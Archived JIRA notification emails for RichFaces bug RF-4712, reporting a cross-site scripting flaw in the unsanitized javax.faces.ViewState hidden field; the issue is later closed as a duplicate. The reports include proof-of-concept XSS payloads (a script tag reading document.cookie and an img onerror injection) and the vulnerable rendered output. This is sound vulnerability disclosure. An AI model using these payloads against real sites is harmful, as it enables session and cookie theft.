From jira-events at lists.jboss.org Wed Oct 22 09:56:24 2008
Content-Type: multipart/mixed; boundary="===============0224853326437997548=="
MIME-Version: 1.0
From: Gerrit Brehmer (JIRA) <jira-events at lists.jboss.org>
To: richfaces-issues at lists.jboss.org
Subject: [richfaces-issues] [JBoss JIRA] Created: (RF-4712) hidden field
 javax.faces.ViewState is not sanitized
Date: Wed, 22 Oct 2008 09:56:23 -0400
Message-ID: <3292963.1224683783741.JavaMail.jira@cloud.prod.atl2.jboss.com>

--===============0224853326437997548==
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable

hidden field javax.faces.ViewState is not sanitized
---------------------------------------------------

                 Key: RF-4712
                 URL: https://jira.jboss.org/jira/browse/RF-4712
             Project: RichFaces
          Issue Type: Bug
    Affects Versions: 3.1.2
         Environment: jsf-ri 1.2_06-b02-FCS,  facelets 1.1.13, RichFaces 3.=
1.2SP1, WindowsXP(x86_64)
            Reporter: Gerrit Brehmer
            Assignee: Viktor Volkov
             Fix For: 3.2.0


Here is the sample facelets page in my application that produces the sympto=
m. =


<?xml version=3D"1.0" encoding=3D"UTF-8"?>
<!DOCTYPE html
     PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:f=3D"http://java.sun.com/jsf/core"
       xmlns:h=3D"http://java.sun.com/jsf/html"
       xmlns:ui=3D"http://java.sun.com/jsf/facelets"
       xmlns:a4j=3D"http://richfaces.org/a4j"
       xmlns:rich=3D"http://richfaces.org/rich"
       xmlns=3D"http://www.w3.org/1999/xhtml" >
  <head>
    <title></title>
  </head>
  <body>
    <f:view>
        <h:form>
            <rich:panel header=3D"Simple Echo">
                <h:inputText size=3D"20" value=3D"#{startupBean.command}" >
                    <a4j:support event=3D"onkeyup" reRender=3D"ruleTest" ac=
tion=3D"#{startupBean.doApprove}"/>
                </h:inputText>
                <h:outputText value=3D"#{startupBean.result}" id=3D"ruleTes=
t"/>
            </rich:panel>
        </h:form>
    </f:view>
  </body>
</html>

The fist time rendered output like following,

<?xml version=3D"1.0"?>
<html xmlns=3D"http://www.w3.org/1999/xhtml">
<head><title></title><link type=3D"text/css" rel=3D"stylesheet" href=3D"/a4=
j_3_1_2.GAcss/panel.xcss/DATB/eAGTWzQ.BgAD.AG8.jsf" /><script type=3D"text/=
javascript" src=3D"/a4j_3_1_2.GAorg.ajax4jsf.javascript.AjaxScript.jsf">
</script></head>
<body><span id=3D"j_id2:ruleTest">world</span><meta name=3D"Ajax-Update-Ids=
" content=3D"j_id2:ruleTest" /><span id=3D"ajax-view-state"><input type=3D"=
hidden" name=3D"javax.faces.ViewState" id=3D"javax.faces.ViewState" value=
=3D"_id2" /></span><meta id=3D"Ajax-Response" name=3D"Ajax-Response" conten=
t=3D"true" /></body>
</html>

When the javax.faces.ViewState hidden param injection made a Post Request l=
ike below

AJAXREQUEST=3D_viewRoot&j_id2=3Dj_id2&j_id2%3Aj_id4=3Dhello&javax.faces.Vie=
wState=3D_id2"<script>alert(document.cookie);</script>&j_id2%3Aj_id5=3Dj_id=
2%3Aj_id5&

rendered response is =


<?xml version=3D"1.0"?>
<html xmlns=3D"http://www.w3.org/1999/xhtml">
<head><title></title><link type=3D"text/css" rel=3D"stylesheet" href=3D"/a4=
j_3_1_2.GAcss/panel.xcss/DATB/eAGTWzQ.BgAD.AG8.jsf" /><script type=3D"text/=
javascript" src=3D"/a4j_3_1_2.GAorg.ajax4jsf.javascript.AjaxScript.jsf">
</script></head>
<body><span id=3D"j_id2:ruleTest">world</span><meta name=3D"Ajax-Update-Ids=
" content=3D"j_id2:ruleTest" /><span id=3D"ajax-view-state"><input type=3D"=
hidden" name=3D"javax.faces.ViewState" id=3D"javax.faces.ViewState" value=
=3D"_id2" /><script type=3D"text/javascript">//<![CDATA[
alert(document.cookie);
//]]>
</script>" /&gt;</span><meta id=3D"Ajax-Response" name=3D"Ajax-Response" co=
ntent=3D"true" /></body></html>


I'm not sure it's jsf-ri issue or richfaces, but if javax.faces.STATE_SAVIN=
G_METHOD set to client,
I couldn't  reproduce the same issue.

-- =

This message is automatically generated by JIRA.
-
If you think it was sent incorrectly contact one of the administrators: htt=
ps://jira.jboss.org/jira/secure/Administrators.jspa
-
For more information on JIRA, see: http://www.atlassian.com/software/jira

       =20

--===============0224853326437997548==--

From jira-events at lists.jboss.org Wed Oct 22 10:01:21 2008
Content-Type: multipart/mixed; boundary="===============0086958599033589984=="
MIME-Version: 1.0
From: Gerrit Brehmer (JIRA) <jira-events at lists.jboss.org>
To: richfaces-issues at lists.jboss.org
Subject: [richfaces-issues] [JBoss JIRA] Updated: (RF-4712) hidden field
 javax.faces.ViewState is not sanitized
Date: Wed, 22 Oct 2008 10:01:21 -0400
Message-ID: <4628566.1224684081369.JavaMail.jira@cloud.prod.atl2.jboss.com>
In-Reply-To: 3292963.1224683783741.JavaMail.jira@cloud.prod.atl2.jboss.com

--===============0086958599033589984==
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable


     [ https://jira.jboss.org/jira/browse/RF-4712?page=3Dcom.atlassian.jira=
.plugin.system.issuetabpanels:all-tabpanel ]

Gerrit Brehmer updated RF-4712:
-------------------------------

          Environment: jsf-ri 1.2_09-BETA1,  WindowsXP, Firefox 3.0.0.3  (w=
as: jsf-ri 1.2_06-b02-FCS,  facelets 1.1.13, RichFaces 3.1.2SP1, WindowsXP(=
x86_64))
        Fix Version/s:     (was: 3.2.0)
    Affects Version/s: 3.2.2
                           (was: 3.1.2)
          Description: =

Sorry for duplicating the old bug, but I think he had the same problem...

We had a Security Audit of our Web Portal and they found a possible Cross S=
ite Scripting Problem:

If I attach the following at any JSF site url I get a javascript popup:
?AJAXREQUEST=3D&javax.faces.ViewState=3Dj_id1s"/><img+src=3DXX+onerror=3Dal=
ert(1)>

I know that we could filter each request.

  was:
Here is the sample facelets page in my application that produces the sympto=
m. =


<?xml version=3D"1.0" encoding=3D"UTF-8"?>
<!DOCTYPE html
     PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:f=3D"http://java.sun.com/jsf/core"
       xmlns:h=3D"http://java.sun.com/jsf/html"
       xmlns:ui=3D"http://java.sun.com/jsf/facelets"
       xmlns:a4j=3D"http://richfaces.org/a4j"
       xmlns:rich=3D"http://richfaces.org/rich"
       xmlns=3D"http://www.w3.org/1999/xhtml" >
  <head>
    <title></title>
  </head>
  <body>
    <f:view>
        <h:form>
            <rich:panel header=3D"Simple Echo">
                <h:inputText size=3D"20" value=3D"#{startupBean.command}" >
                    <a4j:support event=3D"onkeyup" reRender=3D"ruleTest" ac=
tion=3D"#{startupBean.doApprove}"/>
                </h:inputText>
                <h:outputText value=3D"#{startupBean.result}" id=3D"ruleTes=
t"/>
            </rich:panel>
        </h:form>
    </f:view>
  </body>
</html>

The fist time rendered output like following,

<?xml version=3D"1.0"?>
<html xmlns=3D"http://www.w3.org/1999/xhtml">
<head><title></title><link type=3D"text/css" rel=3D"stylesheet" href=3D"/a4=
j_3_1_2.GAcss/panel.xcss/DATB/eAGTWzQ.BgAD.AG8.jsf" /><script type=3D"text/=
javascript" src=3D"/a4j_3_1_2.GAorg.ajax4jsf.javascript.AjaxScript.jsf">
</script></head>
<body><span id=3D"j_id2:ruleTest">world</span><meta name=3D"Ajax-Update-Ids=
" content=3D"j_id2:ruleTest" /><span id=3D"ajax-view-state"><input type=3D"=
hidden" name=3D"javax.faces.ViewState" id=3D"javax.faces.ViewState" value=
=3D"_id2" /></span><meta id=3D"Ajax-Response" name=3D"Ajax-Response" conten=
t=3D"true" /></body>
</html>

When the javax.faces.ViewState hidden param injection made a Post Request l=
ike below

AJAXREQUEST=3D_viewRoot&j_id2=3Dj_id2&j_id2%3Aj_id4=3Dhello&javax.faces.Vie=
wState=3D_id2"<script>alert(document.cookie);</script>&j_id2%3Aj_id5=3Dj_id=
2%3Aj_id5&

rendered response is =


<?xml version=3D"1.0"?>
<html xmlns=3D"http://www.w3.org/1999/xhtml">
<head><title></title><link type=3D"text/css" rel=3D"stylesheet" href=3D"/a4=
j_3_1_2.GAcss/panel.xcss/DATB/eAGTWzQ.BgAD.AG8.jsf" /><script type=3D"text/=
javascript" src=3D"/a4j_3_1_2.GAorg.ajax4jsf.javascript.AjaxScript.jsf">
</script></head>
<body><span id=3D"j_id2:ruleTest">world</span><meta name=3D"Ajax-Update-Ids=
" content=3D"j_id2:ruleTest" /><span id=3D"ajax-view-state"><input type=3D"=
hidden" name=3D"javax.faces.ViewState" id=3D"javax.faces.ViewState" value=
=3D"_id2" /><script type=3D"text/javascript">//<![CDATA[
alert(document.cookie);
//]]>
</script>" /&gt;</span><meta id=3D"Ajax-Response" name=3D"Ajax-Response" co=
ntent=3D"true" /></body></html>


I'm not sure it's jsf-ri issue or richfaces, but if javax.faces.STATE_SAVIN=
G_METHOD set to client,
I couldn't  reproduce the same issue.



> hidden field javax.faces.ViewState is not sanitized
> ---------------------------------------------------
>
>                 Key: RF-4712
>                 URL: https://jira.jboss.org/jira/browse/RF-4712
>             Project: RichFaces
>          Issue Type: Bug
>    Affects Versions: 3.2.2
>         Environment: jsf-ri 1.2_09-BETA1,  WindowsXP, Firefox 3.0.0.3
>            Reporter: Gerrit Brehmer
>            Assignee: Viktor Volkov
>
> Sorry for duplicating the old bug, but I think he had the same problem...
> We had a Security Audit of our Web Portal and they found a possible Cross=
 Site Scripting Problem:
> If I attach the following at any JSF site url I get a javascript popup:
> ?AJAXREQUEST=3D&javax.faces.ViewState=3Dj_id1s"/><img+src=3DXX+onerror=3D=
alert(1)>
> I know that we could filter each request.

-- =

This message is automatically generated by JIRA.
-
If you think it was sent incorrectly contact one of the administrators: htt=
ps://jira.jboss.org/jira/secure/Administrators.jspa
-
For more information on JIRA, see: http://www.atlassian.com/software/jira

       =20

--===============0086958599033589984==--

From jira-events at lists.jboss.org Wed Oct 22 11:04:21 2008
Content-Type: multipart/mixed; boundary="===============3582141525292863518=="
MIME-Version: 1.0
From: Gerrit Brehmer (JIRA) <jira-events at lists.jboss.org>
To: richfaces-issues at lists.jboss.org
Subject: [richfaces-issues] [JBoss JIRA] Closed: (RF-4712) hidden field
 javax.faces.ViewState is not sanitized
Date: Wed, 22 Oct 2008 11:04:21 -0400
Message-ID: <20688055.1224687861098.JavaMail.jira@cloud.prod.atl2.jboss.com>
In-Reply-To: 3292963.1224683783741.JavaMail.jira@cloud.prod.atl2.jboss.com

--===============3582141525292863518==
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable


     [ https://jira.jboss.org/jira/browse/RF-4712?page=3Dcom.atlassian.jira=
.plugin.system.issuetabpanels:all-tabpanel ]

Gerrit Brehmer closed RF-4712.
------------------------------

    Resolution: Duplicate Issue


duplicated RF-4713

> hidden field javax.faces.ViewState is not sanitized
> ---------------------------------------------------
>
>                 Key: RF-4712
>                 URL: https://jira.jboss.org/jira/browse/RF-4712
>             Project: RichFaces
>          Issue Type: Bug
>    Affects Versions: 3.2.2
>         Environment: jsf-ri 1.2_09-BETA1,  WindowsXP, Firefox 3.0.0.3
>            Reporter: Gerrit Brehmer
>            Assignee: Viktor Volkov
>
> Sorry for duplicating the old bug, but I think he had the same problem...
> We had a Security Audit of our Web Portal and they found a possible Cross=
 Site Scripting Problem:
> If I attach the following at any JSF site url I get a javascript popup:
> ?AJAXREQUEST=3D&javax.faces.ViewState=3Dj_id1s"/><img+src=3DXX+onerror=3D=
alert(1)>
> I know that we could filter each request.

-- =

This message is automatically generated by JIRA.
-
If you think it was sent incorrectly contact one of the administrators: htt=
ps://jira.jboss.org/jira/secure/Administrators.jspa
-
For more information on JIRA, see: http://www.atlassian.com/software/jira

       =20

--===============3582141525292863518==--